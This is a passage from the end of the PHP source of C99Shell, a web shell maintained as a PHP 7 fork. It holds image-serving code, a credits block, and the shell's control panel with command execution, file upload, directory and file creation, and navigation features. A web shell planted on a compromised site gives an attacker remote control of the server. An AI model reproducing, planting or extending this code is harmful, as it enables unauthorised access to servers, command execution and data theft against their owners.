header("Expires: " . date("r", mktime(0, 0, 0, 1, 1, 2030))); header("Cache-control: max-age=" . (60 * 60 * 24 * 7)); header("Last-Modified: " . date("r", filemtime(__FILE__))); foreach ($imgequals as $k => $v) { if (in_array($img, $v)) { $img = $k; break; } } if (empty($images[$img])) { $img = "small_unk"; } if (in_array($img, $ext_tar)) { $img = "ext_tar"; } echo base64_decode($images[$img]); } else { foreach ($imgequals as $a => $b) { foreach ($b as $d) { if ($a != $d) { if (!empty($images[$d])) { echo ("Warning! Remove \$images[" . $d . "]
"); } } } } natsort($images); $k = array_keys($images); echo ""; foreach ($k as $u) { echo $u . ":
"; } echo ""; } exit; } if ($act == "about") { echo "Credits:

Kudos to the "Original Creators" of C99Shell,

KaizenLouie for Latest safe-build and update for PHP 7, and cermmik for MySQL support.

Thanks to all who reported the bugs.
If there are more bugs, please create an issue in https://github.com/KaizenLouie/C99Shell-PHP7
for MySQL-related bugs create an issue in https://github.com/cermmik/C99-WebShell "; } ?>

:: Command execute ::
Enter:	Select: " . htmlspecialchars($als[0]) . ""; } ?>

:: Search ::   - regexp

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c99shell v. maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: ]--